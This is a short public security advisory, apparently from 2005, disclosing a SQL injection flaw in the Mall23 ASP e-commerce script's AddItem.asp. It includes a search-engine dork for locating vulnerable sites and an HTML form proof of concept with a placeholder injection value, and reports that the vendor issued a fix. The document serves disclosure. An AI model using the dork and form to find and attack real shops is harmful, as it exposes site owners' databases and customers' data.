mall23.txt

`ORIGINAL LINK: http://systemsecure.org/ssforum/viewtopic.php?t=277  
  
#-------------------------------------  
# Ref: SS#21092005  
# SYSTEMSECURE.ORG - Advisory/Exploit  
#  
# * PUBLIC ADVISORY *  
#  
#-------------------------------------  
  
» Software: Mall23  
  
» Link: http://www.mall23.com/  
  
» Attacks: SQL Injection  
  
» Discovered by: David Sopas Ferreira aka SmOk3  
[david at systemsecure.org]  
  
» GoogleDork: "Powered by Mall23.com"  
  
  
-- ! Description !--  
  
Vendor product description: " Mall23 provides business-focused eCommerce   
products to effectively and measurably  
maximise your investment. Includes unique and powerful features specifically   
designed for Internet Hosting companies.  
Build your revenue and increase client confidence! Mall23 also generates an   
immediate return on your investment -  
- several times over. Discover an all-inclusive package that needs no   
customizations or add-ons. "  
  
Mall23, ASP e-commerce script, is vulnerable to SQL Injection attack using   
POST method. Impact an unauthenticated  
attacker may execute arbitrary SQL statements on the vulnerable system. This   
may compromise the integrity of your  
database and expose sensitive information.  
  
  
» Affected file: AddItem.asp - variable: $idOption_Dropdown_2  
  
» Proof of Concept (exploit):  
  
<form   
action="http://siterunning_mall23.com:80/m23Basket/AddItem.asp?idProduct=6"   
method="POST">  
<input type="hidden" name="idOption_Dropdown_2" value="'[SQL INJECTION]">  
<input type="Submit" name="submit" value="Test Exploit">  
</form>  
  
  
-- ! Solution !--  
  
Vendor was contacted and it fixed the problem in the same day it was   
reported. Upgrade to version 4.11 available  
at http://www.mall23.com .  
  
  
<base64>Rm9y52EgUG9ydHVnYWw=</base64>  
  
# -EOF-   
`